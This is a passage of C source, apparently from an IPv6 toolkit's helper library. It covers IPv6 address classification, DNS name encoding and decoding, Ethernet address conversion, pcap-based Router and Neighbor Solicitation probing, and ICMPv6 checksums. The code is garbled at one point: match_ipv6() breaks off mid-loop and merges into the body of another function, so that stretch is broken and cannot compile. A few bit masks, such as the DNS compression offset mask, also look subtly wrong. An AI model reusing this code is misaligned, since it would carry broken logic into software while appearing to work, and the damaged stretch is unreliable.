addr->subtype= MCAST_INVALID; } else if((addr->ip6.s6_addr32[0] & htonl(0xfff00000)) == htonl(0xff700000)){ addr->subtype= MCAST_EMBEDRP; } scope= (htonl(addr->ip6.s6_addr32[0]) & 0x000f0000) >> 16; switch(scope){ case 0: addr->scope= SCOPE_RESERVED; break; case 1: addr->scope= SCOPE_INTERFACE; break; case 2: addr->scope= SCOPE_LINK; break; case 3: addr->scope= SCOPE_RESERVED; break; case 4: addr->scope= SCOPE_ADMIN; break; case 5: addr->scope= SCOPE_SITE; break; case 8: addr->scope= SCOPE_ORGANIZATION; break; case 0Xe: addr->scope= SCOPE_GLOBAL; break; default: addr->scope= SCOPE_UNASSIGNED; break; } } else{ addr->subtype= MCAST_UNKNOWN; } } else{ addr->type= IPV6_UNICAST; addr->iidtype= IID_UNSPECIFIED; addr->iidsubtype= IID_UNSPECIFIED; if(IN6_IS_ADDR_LOOPBACK(&(addr->ip6))){ addr->subtype= UCAST_LOOPBACK; addr->scope= SCOPE_INTERFACE; } else if(IN6_IS_ADDR_V4MAPPED(&(addr->ip6))){ addr->subtype= UCAST_V4MAPPED; addr->scope= SCOPE_UNSPECIFIED; } else if(IN6_IS_ADDR_V4COMPAT(&(addr->ip6))){ addr->subtype= UCAST_V4COMPAT; addr->scope= SCOPE_UNSPECIFIED; } else if(IN6_IS_ADDR_LINKLOCAL(&(addr->ip6))){ addr->subtype= UCAST_LINKLOCAL; addr->scope= SCOPE_LINK; } else if(IN6_IS_ADDR_SITELOCAL(&(addr->ip6))){ addr->subtype= UCAST_SITELOCAL; addr->scope= SCOPE_SITE; } else if(IN6_IS_ADDR_UNIQUELOCAL(&(addr->ip6))){ addr->subtype= UCAST_UNIQUELOCAL; addr->scope= SCOPE_GLOBAL; } else if(IN6_IS_ADDR_6TO4(&(addr->ip6))){ addr->subtype= UCAST_6TO4; addr->scope= SCOPE_GLOBAL; } else if(IN6_IS_ADDR_TEREDO(&(addr->ip6)) || IN6_IS_ADDR_TEREDO_LEGACY(&(addr->ip6))){ addr->subtype= UCAST_TEREDO; addr->scope= SCOPE_GLOBAL; /* If the U or G bytes are set, the IID type is unknown */ if(ntohl(addr->ip6.s6_addr32[2]) & 0x03000000){ addr->iidtype= IID_TEREDO_UNKNOWN; } else if(ntohs(addr->ip6.s6_addr32[2]) & 0x3cff0000){ addr->iidtype= IID_TEREDO_RFC5991; } else{ addr->iidtype= IID_TEREDO_RFC4380; } } else{ addr->subtype= UCAST_GLOBAL; addr->scope= SCOPE_GLOBAL; } if(addr->subtype==UCAST_GLOBAL || addr->subtype==UCAST_V4MAPPED || addr->subtype==UCAST_V4COMPAT || \ addr->subtype==UCAST_LINKLOCAL || addr->subtype==UCAST_SITELOCAL || addr->subtype==UCAST_UNIQUELOCAL ||\ addr->subtype == UCAST_6TO4){ if( (addr->ip6.s6_addr32[2] & htonl(0x020000ff)) == htonl(0x020000ff) && (addr->ip6.s6_addr32[3] & htonl(0xff000000)) == htonl(0xfe000000)){ addr->iidtype= IID_MACDERIVED; addr->iidsubtype= (ntohl(addr->ip6.s6_addr32[2]) >> 8) & 0xfffdffff; } else if((addr->ip6.s6_addr32[2] & htonl(0xfdffffff)) == htonl(0x00005efe)){ /* We assume the u bit can be o o 1, but the i/g bit must be 0 */ addr->iidtype= IID_ISATAP; } else if(addr->ip6.s6_addr32[2] == 0 && (addr->ip6.s6_addr32[3] & htonl(0xff000000)) != 0 && (ntohl(addr->ip6.s6_addr32[3]) & 0x0000ffff) != 0){ addr->iidtype= IID_EMBEDDEDIPV4; addr->iidsubtype= IID_EMBEDDEDIPV4_32; } else if(addr->ip6.s6_addr32[2] == 0 && \ ((addr->ip6.s6_addr32[3] & htonl(0xff000000)) == 0 && is_service_port(ntohl(addr->ip6.s6_addr32[3]) & 0x0000ffff))){ addr->iidtype= IID_EMBEDDEDPORT; } else if(addr->ip6.s6_addr32[2] == 0 && \ ((addr->ip6.s6_addr32[3] & htonl(0x0000ff00)) == 0 && is_service_port(ntohl(addr->ip6.s6_addr32[3]) >> 16))){ addr->iidtype= IID_EMBEDDEDPORTREV; } else if(addr->ip6.s6_addr32[2] == 0 && (addr->ip6.s6_addr32[3] & htonl(0xff000000)) == 0 && (ntohl(addr->ip6.s6_addr32[3]) & 0x0000ffff) != 0){ addr->iidtype= IID_LOWBYTE; } else if( (ntohl(addr->ip6.s6_addr32[2]) >> 16) <= 0x255 && (ntohl(addr->ip6.s6_addr32[2]) & 0x0000ffff) <= 0x255 && \ (ntohl(addr->ip6.s6_addr32[3]) >> 16) <= 0x255 && (ntohl(addr->ip6.s6_addr32[3]) & 0x0000ffff) <= 0x255){ addr->iidtype= IID_EMBEDDEDIPV4; addr->iidsubtype= IID_EMBEDDEDIPV4_64; } else if( zero_byte_iid(&(addr->ip6)) > 2 ){ addr->iidtype= IID_PATTERN_BYTES; } else{ addr->iidtype= IID_RANDOM; } } } } /* * Function: dns_decode() * * Decode a domain name from DNS wire format to an ASCII string */ int dns_decode(unsigned char *start, unsigned int size, unsigned char *ptr, \ char *out, unsigned int outsize, unsigned char **next){ unsigned char *end; char *w; unsigned int clabels=0, nlabels=0; end= start+size; w= out; while(nlabels <= MAX_DNS_LABELS){ switch((*ptr & 0xc0)){ case 0x00: /* No compression */ /* Check wether the label spans past the end of the packet */ if((ptr + *ptr) >= end) return(-1); /* Check whether there is room to write this label */ if( (w+ *ptr + 1) >=(out+outsize)) return(-1); /* Check whether this is a zero-label */ if(*ptr == 0){ ptr++; /* Check whether there is a single-label domain */ if(ptr < end){ if(*ptr == 0) ptr++; } if(w == out){ *w='.'; w++; } *w=0x00; /* null-terminate the string */ /* If we're past a compressed label, '*next' already contains the right value */ if(!clabels){ if(ptr >= end) *next= NULL; else *next=ptr; } return(0); } else{ memcpy(w, (ptr+1), *ptr); w= w + *ptr; *w= '.'; w++; ptr= ptr+ (*ptr + 1); if(ptr >= end) return(-1); } break; case 0xc0: /* Compression */ /* A compressed label ocuppies two bytes */ if( (ptr+1) >= end) return(-1); /* The next domain is the one follong the two-byte compressed label */ if(!clabels){ *next= ptr+2; if(*next >= end) *next= NULL; } clabels++; if(clabels > MAX_DNS_CLABELS){ return(-1); } ptr= start + ((((unsigned short int)(*ptr & 0x3c))<< 8) + *(ptr+1)); break; default: return(-1); } } return(0); } /* * dns_str2wire() * * Converts a DNS name to DNS wire format (uncompressed) */ int dns_str2wire(char *str, unsigned int slen, char *wire, unsigned int wlen){ char *label, *src, *dst; unsigned int llen; if(wlen < slen) return(-1); src= str; dst= wire; while(1){ llen=0; label= src; while(*src != 0 && *src != '.' && src < (str + slen)){ src++; llen++; } *dst= llen; dst++; memcpy(dst, label, llen); dst+= llen; if(*src == 0){ *dst= 0; dst++; break; } else if(src >= (str + slen)){ return(-1); } else{ src++; } } return(dst-wire); } /* * Function: ether_multicast() * * Obtains the Ethernet multicast address corresponding to an IPv6 multicast address. */ struct ether_addr ether_multicast(const struct in6_addr *ipv6addr){ unsigned int i; struct ether_addr ether; ether.a[0]=0x33; ether.a[1]=0x33; for(i=2;i<6;i++) ether.a[i]= ipv6addr->s6_addr[i+10]; return ether; } /* * Function: ether_pton() * * Convert a string (printable Ethernet Address) into binary format */ int ether_pton(const char *ascii, struct ether_addr *etheraddr, unsigned int s){ unsigned int i, a[6]; if(s < ETHER_ADDR_LEN) return 0; if(ascii){ if( sscanf(ascii,"%x:%x:%x:%x:%x:%x", &a[0], &a[1], &a[2], &a[3], &a[4], &a[5]) == 6){ for(i=0;i<6;i++) etheraddr->a[i]= a[i]; return 1; } } return 0; } /* * Function: find_ipv6_router_full() * * Finds a local router (by means of Neighbor Discovery) */ int find_ipv6_router_full(pcap_t *pfd, struct iface_data *idata){ struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct nd_router_advert *pkt_ra; unsigned char *pkt_end; unsigned char *prev_nh; volatile unsigned char *ptr; volatile unsigned char *p; size_t nw; unsigned char buffer[65556]; unsigned int rs_max_packet_size; struct ether_header *ether; unsigned char *v6buffer; struct ip6_hdr *ipv6; struct nd_router_solicit *rs; struct nd_opt_slla *sllaopt; struct nd_opt_prefix_info *pio; volatile unsigned int tries=0; volatile unsigned int foundrouter=0; struct sigaction new_sig, old_sig; unsigned char error_f=0; int result; rs_max_packet_size = idata->mtu; ether = (struct ether_header *) buffer; v6buffer = buffer + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_RANS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f>1) printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } if(pcap_setfilter(pfd, &pcap_filter) == -1){ if(idata->verbose_f > 1) printf("pcap_setfilter(): %s", pcap_geterr(pfd)); return(-1); } pcap_freecode(&pcap_filter); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= idata->ip6_local; if ( inet_pton(AF_INET6, ALL_ROUTERS_MULTICAST_ADDR, &(ipv6->ip6_dst)) <= 0){ if(idata->verbose_f>1) puts("inet_pton(): Error converting All Routers address from presentation to network format"); return(-1); } ether->src = idata->ether; if(ether_pton(ETHER_ALLROUTERS_LINK_ADDR, &(ether->dst), sizeof(struct ether_addr)) == 0){ if(idata->verbose_f>1) puts("ether_pton(): Error converting all-nodes multicast address"); return(-1); } ether->ether_type = htons(ETHERTYPE_IPV6); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); *prev_nh = IPPROTO_ICMPV6; ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if( (ptr+sizeof(struct nd_router_solicit)) > (v6buffer+rs_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while inserting Router Solicitation header"); return(-1); } rs= (struct nd_router_solicit *) (ptr); rs->nd_rs_type = ND_ROUTER_SOLICIT; rs->nd_rs_code = 0; rs->nd_rs_reserved = 0; ptr += sizeof(struct nd_router_solicit); sllaopt = (struct nd_opt_slla *) ptr; if( (ptr+sizeof(struct nd_opt_slla)) > (v6buffer+rs_max_packet_size)){ if(idata->verbose_f>1) puts("RS message too large while processing source link-layer addresss opt."); return(-1); } sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; memcpy(sllaopt->address, &(idata->ether.a), ETH_ALEN); ptr += sizeof(struct nd_opt_slla); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); rs->nd_rs_cksum = 0; rs->nd_rs_cksum = in_chksum(v6buffer, rs, ptr-((unsigned char *)rs), IPPROTO_ICMPV6); /* We set the signal handler, and the anchor for siglongjump() */ canjump=0; memset(&new_sig, 0, sizeof(struct sigaction)); sigemptyset(&new_sig.sa_mask); new_sig.sa_handler= &sig_alarm; alarm(0); if( sigaction(SIGALRM, &new_sig, &old_sig) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(sigsetjmp(env, 1) != 0) tries++; canjump=1; while(tries<3 && !foundrouter && !error_f){ if((nw=pcap_inject(pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f>1) printf("pcap_inject(): %s\n", pcap_geterr(pfd)); error_f=1; break; } if(nw != (ptr-buffer)){ if(idata->verbose_f>1) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); error_f=1; break; } alarm(idata->local_timeout + 1); while(!foundrouter && !error_f){ do{ if( (result=pcap_next_ex(pfd, &pkthdr, &pktdata)) == -1){ if(idata->verbose_f>1) printf("pcap_next_ex(): %s", pcap_geterr(pfd)); error_f=1; break; } }while(result == 0 || pktdata == NULL); if(error_f) break; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_ra = (struct nd_router_advert *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_ra + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ra + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain a Router Advertisement message with a source link-layer address option */ if( (pkt_end - (unsigned char *) pkt_ra) < (sizeof(struct nd_router_advert) + \ sizeof(struct nd_opt_slla))) continue; /* Neighbor Discovery packets must have a Hop Limit of 255 */ if(pkt_ipv6->ip6_hlim != 255) continue; /* Check that the IPv6 Source Address of the Router Advertisement is an IPv6 link-local address. */ if(!IN6_IS_ADDR_LINKLOCAL(&(pkt_ipv6->ip6_src))) continue; /* Check that that the Destination Address of the Router Advertisement is either the one that we used for sending the Router Solicitation message or a multicast address (typically the all-nodes) */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(ipv6->ip6_src)) \ && !IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_dst))) continue; /* Check that the ICMPv6 checksum is correct. If the received checksum is valid, and we compute the checksum over the received packet (including the Checksum field) the result is 0. Otherwise, the packet has been corrupted. */ if(in_chksum(pkt_ipv6, pkt_ra, pkt_end- (unsigned char *)pkt_ra, IPPROTO_ICMPV6) != 0) continue; p= (unsigned char *) pkt_ra + sizeof(struct nd_router_advert); /* Process Router Advertisement options */ while( (p+ *(p+1) * 8) <= pkt_end && *(p+1)!=0 && !error_f){ switch(*p){ case ND_OPT_SOURCE_LINKADDR: if( (*(p+1) * 8) != sizeof(struct nd_opt_tlla)) break; /* Got a response, so we shouln't time out */ alarm(0); /* Save the link-layer address */ idata->router_ether = *(struct ether_addr *) (p+2); idata->router_ip6= pkt_ipv6->ip6_src; foundrouter=1; break; case ND_OPT_PREFIX_INFORMATION: if(*(p+1) != 4) break; pio= (struct nd_opt_prefix_info *) p; if((idata->prefix_ol.nprefix) < idata->prefix_ol.maxprefix){ if( (pio->nd_opt_pi_flags_reserved & ND_OPT_PI_FLAG_ONLINK) && \ (pio->nd_opt_pi_prefix_len <= 128) && !is_ip6_in_prefix_list(&(pio->nd_opt_pi_prefix), \ &(idata->prefix_ol))){ if( (idata->prefix_ol.prefix[idata->prefix_ol.nprefix] = \ malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f>1) puts("Error in malloc() while learning prefixes"); error_f=1; break; } (idata->prefix_ol.prefix[idata->prefix_ol.nprefix])->ip6= pio->nd_opt_pi_prefix; (idata->prefix_ol.prefix[idata->prefix_ol.nprefix])->len= pio->nd_opt_pi_prefix_len; sanitize_ipv6_prefix(&((idata->prefix_ol.prefix[idata->prefix_ol.nprefix])->ip6), \ (idata->prefix_ol.prefix[idata->prefix_ol.nprefix])->len); (idata->prefix_ol.nprefix)++; } } /* We expect the autoconfiguration prefix to have a length between 32 and 64 bits. We used to require it to be 64-bits long, but some routers have been found to advertise 48-bit long prefixes. Hence, we have relaxed the allowed length. */ if(idata->prefix_ac.nprefix < idata->prefix_ac.maxprefix){ if( (pio->nd_opt_pi_flags_reserved & ND_OPT_PI_FLAG_AUTO) && \ (pio->nd_opt_pi_prefix_len >= 32 && pio->nd_opt_pi_prefix_len <= 64) && \ !is_ip6_in_prefix_list(&(pio->nd_opt_pi_prefix), &(idata->prefix_ac))){ if((idata->prefix_ac.prefix[idata->prefix_ac.nprefix] = \ malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f>1) puts("Error in malloc() while learning prefixes"); error_f=1; break; } (idata->prefix_ac.prefix[idata->prefix_ac.nprefix])->ip6= \ pio->nd_opt_pi_prefix; /* If the prefix is valid, we assume it to be 64-bit long. In the past, we used the length advertised by pio->nd_opt_pi_prefix_len. */ (idata->prefix_ac.prefix[idata->prefix_ac.nprefix])->len= 64; sanitize_ipv6_prefix(&((idata->prefix_ac.prefix[idata->prefix_ac.nprefix])->ip6), \ (idata->prefix_ac.prefix[idata->prefix_ac.nprefix])->len); if(!idata->ip6_global_flag && idata->ip6_global.nprefix < idata->ip6_global.maxprefix){ if( (idata->ip6_global.prefix[idata->ip6_global.nprefix] = \ malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f>1) puts("Error in malloc() creating local SLAAC addresses"); error_f=1; break; } generate_slaac_address(&(idata->prefix_ac.prefix[idata->prefix_ac.nprefix]->ip6), \ &(idata->ether), &((idata->ip6_global.prefix[idata->ip6_global.nprefix])->ip6)); (idata->ip6_global.prefix[idata->ip6_global.nprefix])->len = 64; (idata->ip6_global.nprefix)++; } (idata->prefix_ac.nprefix)++; } } break; default: break; } p= p + *(p+1) * 8; } /* Processing options */ } /* Processing packets */ } /* Resending Router Solicitations */ /* If we added at least one global address, we set the corresponding flag to 1 */ if(idata->ip6_global.nprefix) idata->ip6_global_flag=1; if( sigaction(SIGALRM, &old_sig, NULL) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(foundrouter) return 1; else return 0; } /* * Function: ether_ntop() * * Convert binary Ethernet Address into printable foramt (an ASCII string) */ int ether_ntop(const struct ether_addr *ether, char *ascii, size_t s){ unsigned int r; if(s < ETHER_ADDR_PLEN) return 0; r=snprintf(ascii, s, "%02x:%02x:%02x:%02x:%02x:%02x", ether->a[0], ether->a[1], ether->a[2], ether->a[3], \ ether->a[4], ether->a[5]); if(r != 17) return 0; return 1; } /* * Function: ether_to_ipv6_linklocal() * * Generates an IPv6 link-local address (with modified EUI-64 identifiers) based on * an Ethernet address. */ void ether_to_ipv6_linklocal(struct ether_addr *etheraddr, struct in6_addr *ipv6addr){ ipv6addr->s6_addr32[0]= htonl(0xfe800000); /* Link-local unicast prefix */ ipv6addr->s6_addr32[1]= htonl(0x00000000); ipv6addr->s6_addr[8]= etheraddr->a[0] | 0x02; ipv6addr->s6_addr[9]= etheraddr->a[1]; ipv6addr->s6_addr[10]= etheraddr->a[2]; ipv6addr->s6_addr[11]= 0xff; ipv6addr->s6_addr[12]= 0xfe; ipv6addr->s6_addr[13]= etheraddr->a[3]; ipv6addr->s6_addr[14]= etheraddr->a[4]; ipv6addr->s6_addr[15]= etheraddr->a[5]; } /* * Function match_ipv6() * * Finds if an IPv6 address matches a prefix in a list of prefixes. */ unsigned int match_ipv6(struct in6_addr *prefixlist, uint8_t *prefixlen, unsigned int nprefix, struct in6_addr *ipv6addr){ unsigned int i, j; struct in6_addr dummyipv6_1, dummyipv6_2; for(i=0; ia[j] != addrlist[i].a[j]) break; if(j==6) return 1; } return 0; } /* * Function: in_chksum() * * Calculate the 16-bit ICMPv6 checksum */ uint16_t in_chksum(void *ptr_ipv6, void *ptr_icmpv6, size_t len, uint8_t proto){ struct ipv6pseudohdr pseudohdr; struct ip6_hdr *v6packet; size_t nleft; unsigned int sum = 0; uint16_t *w; uint16_t answer = 0; v6packet=ptr_ipv6; memset(&pseudohdr, 0, sizeof(struct ipv6pseudohdr)); pseudohdr.srcaddr= v6packet->ip6_src; pseudohdr.dstaddr= v6packet->ip6_dst; pseudohdr.len = htons(len); pseudohdr.nh = proto; nleft=40; w= (uint16_t *) &pseudohdr; while(nleft > 1){ sum += *w++; nleft -= 2; } nleft= len; w= (uint16_t *) ptr_icmpv6; while(nleft > 1){ sum += *w++; nleft -= 2; } if(nleft == 1){ *(unsigned char *) (&answer) = *(unsigned char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } /* * Function: inset_pad_opt() * * Insert a padding option (Pad1 or PadN) into an IPv6 extension header */ int insert_pad_opt(unsigned char *ptrhdr, const unsigned char *ptrhdrend, unsigned int padn){ unsigned char *ptr; if( (ptrhdrend - ptrhdr) < padn) return 0; if(padn == 1){ *ptrhdr= 0x00; return 1; } else{ ptr=ptrhdr; *ptr= 0x01; ptr++; *ptr= padn-2; ptr+=2; while(ptr < (ptrhdr+padn)){ *ptr= 0x00; ptr++; } return 1; } } /* * Function: ipv6_to_ether() * * Obtains the Ethernet address corresponding to an IPv6 address (by means of Neighbor Discovery) */ int ipv6_to_ether(pcap_t *pfd, struct iface_data *idata, struct in6_addr *targetaddr, struct ether_addr *result_ether){ struct bpf_program pcap_filter; struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct nd_neighbor_advert *pkt_na; unsigned char *pkt_end, *prev_nh; volatile unsigned char *ptr, *p; unsigned char buffer[65556]; unsigned int ns_max_packet_size; struct ether_header *ether; unsigned char *v6buffer; struct ip6_hdr *ipv6; struct nd_neighbor_solicit *ns; struct nd_opt_slla *sllaopt; volatile unsigned int tries=0; unsigned int foundaddr=0; struct sigaction new_sig, old_sig; int result; unsigned char error_f=0; size_t nw; ns_max_packet_size = idata->mtu; ether = (struct ether_header *) buffer; v6buffer = buffer + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; if(pcap_compile(idata->pfd, &pcap_filter, PCAP_ICMPV6_NA_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f>1) printf("pcap_compile(): %s", pcap_geterr(idata->pfd)); return(-1); } if(pcap_setfilter(idata->pfd, &pcap_filter) == -1){ if(idata->verbose_f>1) printf("pcap_setfilter(): %s", pcap_geterr(idata->pfd)); return(-1); } pcap_freecode(&pcap_filter); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= idata->ip6_local; ipv6->ip6_dst= solicited_node(targetaddr); ether->src = idata->ether; ether->dst = ether_multicast(&(ipv6->ip6_dst)); ether->ether_type = htons(ETHERTYPE_IPV6); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); *prev_nh = IPPROTO_ICMPV6; ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if( (ptr+sizeof(struct nd_neighbor_solicit)) > (v6buffer+ns_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while inserting Neighbor Solicitation header"); return(-1); } ns= (struct nd_neighbor_solicit *) (ptr); ns->nd_ns_type = ND_NEIGHBOR_SOLICIT; ns->nd_ns_code = 0; ns->nd_ns_reserved = 0; ns->nd_ns_target = *targetaddr; ptr += sizeof(struct nd_neighbor_solicit); sllaopt = (struct nd_opt_slla *) ptr; if( (ptr+sizeof(struct nd_opt_slla)) > (v6buffer+ns_max_packet_size)){ if(idata->verbose_f>1) puts("NS message too large while processing source link-layer addresss opt."); return(-1); } sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; memcpy(sllaopt->address, &(idata->ether.a), ETH_ALEN); ptr += sizeof(struct nd_opt_slla); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); ns->nd_ns_cksum = 0; ns->nd_ns_cksum = in_chksum(v6buffer, ns, ptr-((unsigned char *)ns), IPPROTO_ICMPV6); /* We set the signal handler, and the anchor for siglongjump() */ canjump=0; memset(&new_sig, 0, sizeof(struct sigaction)); sigemptyset(&new_sig.sa_mask); new_sig.sa_handler= &sig_alarm; alarm(0); if( sigaction(SIGALRM, &new_sig, &old_sig) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(sigsetjmp(env, 1) != 0) tries++; canjump=1; while(tries<3 && !foundaddr && !error_f){ if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f>1) printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); error_f=1; break; } if(nw != (ptr-buffer)){ if(idata->verbose_f>1) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); error_f=1; break; } alarm(idata->local_timeout); while(!foundaddr && !error_f){ do{ if( (result=pcap_next_ex(idata->pfd, &pkthdr, &pktdata)) == -1){ if(idata->verbose_f>1) printf("pcap_next_ex(): %s", pcap_geterr(pfd)); error_f=1; break; } }while(result == 0 || pktdata == NULL); if(error_f) break; #ifdef DEBUG puts("DEBUG: ipv6_to_ether(): Got NA"); #endif pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_na = (struct nd_neighbor_advert *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_na+ pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_na + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain a Neighbor Advertisement message with a source link-layer address option */ if( (pkt_end - (unsigned char *) pkt_na) < (sizeof(struct nd_neighbor_advert) + \ sizeof(struct nd_opt_tlla))){ #ifdef DEBUG puts("DEBUG: ipv6_to_ether(): NA too small"); #endif continue; } /* Neighbor Discovery packets must have a Hop Limit of 255 */ if(pkt_ipv6->ip6_hlim != 255){ #ifdef DEBUG puts("DEBUG: ipv6_to_ether(): NA Hop Limit != 255"); #endif continue; } /* Check that that the Destination Address of the Neighbor Advertisement is the one that we used for sending the Neighbor Solicitation message */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(ipv6->ip6_src))){ #ifdef DEBUG puts("DEBUG: ipv6_to_ether(): NA Dst != NS Src"); #endif continue; } /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_na, pkt_end-((unsigned char *)pkt_na), IPPROTO_ICMPV6) != 0){ #ifdef DEBUG puts("DEBUG: ipv6_to_ether(): NA Checksum invalid"); #endif continue; } /* Check that the ICMPv6 Target Address is the one we had asked for */ if(!is_eq_in6_addr(&(pkt_na->nd_na_target), targetaddr)){ #ifdef DEBUG puts("DEBUG: ipv6_to_ether(): NA Tgt != NS Tgt"); #endif continue; } p= (unsigned char *) pkt_na + sizeof(struct nd_neighbor_advert); /* Process Neighbor Advertisement options */ while( (p+sizeof(struct nd_opt_tlla)) <= pkt_end && (*(p+1) != 0)){ if(*p == ND_OPT_TARGET_LINKADDR){ #ifdef DEBUG puts("DEBUG: ipv6_to_ether(): Found TLLA in NA"); #endif if( (*(p+1) * 8) != sizeof(struct nd_opt_tlla)) break; /* Got a response, so we shouln't time out */ alarm(0); /* Save the link-layer address */ *result_ether= *(struct ether_addr *) (p+2); foundaddr=1; break; } p= p + *(p+1) * 8; } /* Processing options */ } /* Processing packets */ } /* Resending Neighbor Solicitations */ alarm(0); if( sigaction(SIGALRM, &old_sig, NULL) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(foundaddr) return 1; else return 0; } /* * Function: solicited_node() * * Obtains the Solicited-node multicast address corresponding to an IPv6 address. */ struct in6_addr solicited_node(const struct in6_addr *ipv6addr){ struct in6_addr solicited; solicited.s6_addr32[0]= htonl(0xff020000); solicited.s6_addr32[1]= htonl(0); solicited.s6_addr32[2]= htonl(0x00000001); solicited.s6_addr32[3]= htonl(0xff000000) | ipv6addr->s6_addr32[3]; return solicited; } /* * Function: is_eq_in6_addr() * * Compares two IPv6 addresses. Returns 0 if they are equal. */ int is_eq_in6_addr(struct in6_addr *ip1, struct in6_addr *ip2){ unsigned int i; for(i=0; i<4; i++) if(ip1->s6_addr32[i] != ip2->s6_addr32[i]) return FALSE; return TRUE; } /* * Function: generate_slaac_address() * * Generates an IPv6 address (with modified EUI-64 identifiers) based on * a IPv6 prefix and an Ethernet address. */ void generate_slaac_address(struct in6_addr *prefix, struct ether_addr *etheraddr, struct in6_addr *ipv6addr){ unsigned int i; for(i=0;i<2;i++) ipv6addr->s6_addr32[i]= prefix->s6_addr32[i]; ipv6addr->s6_addr[8]= etheraddr->a[0] | 0x02; ipv6addr->s6_addr[9]= etheraddr->a[1]; ipv6addr->s6_addr[10]= etheraddr->a[2]; ipv6addr->s6_addr[11]= 0xff; ipv6addr->s6_addr[12]= 0xfe; ipv6addr->s6_addr[13]= etheraddr->a[3]; ipv6addr->s6_addr[14]= etheraddr->a[4]; ipv6addr->s6_addr[15]= etheraddr->a[5]; } /* * Function: get_if_addrs() * * Obtains Ethernet and IPv6 addresses of a network interface card */ int get_if_addrs(struct iface_data *idata){ struct ifaddrs *ifptr, *ptr; struct sockaddr_in6 *sockin6ptr; #ifdef __linux__ struct sockaddr_ll *sockpptr; #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) struct sockaddr_dl *sockpptr; #endif if(getifaddrs(&ifptr) != 0){ if(idata->verbose_f > 1){ printf("Error while learning addresses of the %s interface\n", idata->iface); } return(-1); } for(ptr=ifptr; ptr != NULL; ptr= ptr->ifa_next){ if(ptr->ifa_addr == NULL) continue; #ifdef __linux__ if( !(idata->ether_flag) && ((ptr->ifa_addr)->sa_family == AF_PACKET)){ if(strncmp(idata->iface, ptr->ifa_name, IFACE_LENGTH-1) == 0){ sockpptr = (struct sockaddr_ll *) (ptr->ifa_addr); if(sockpptr->sll_halen == ETHER_ADDR_LEN){ memcpy((idata->ether).a, sockpptr->sll_addr, ETHER_ADDR_LEN); idata->ether_flag=TRUE; } } } #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) if( !(idata->ether_flag) && ((ptr->ifa_addr)->sa_family == AF_LINK)){ if(strncmp(idata->iface, ptr->ifa_name, IFACE_LENGTH-1) == 0){ sockpptr = (struct sockaddr_dl *) (ptr->ifa_addr); if(sockpptr->sdl_alen == ETHER_ADDR_LEN){ memcpy((idata->ether).a, (sockpptr->sdl_data + 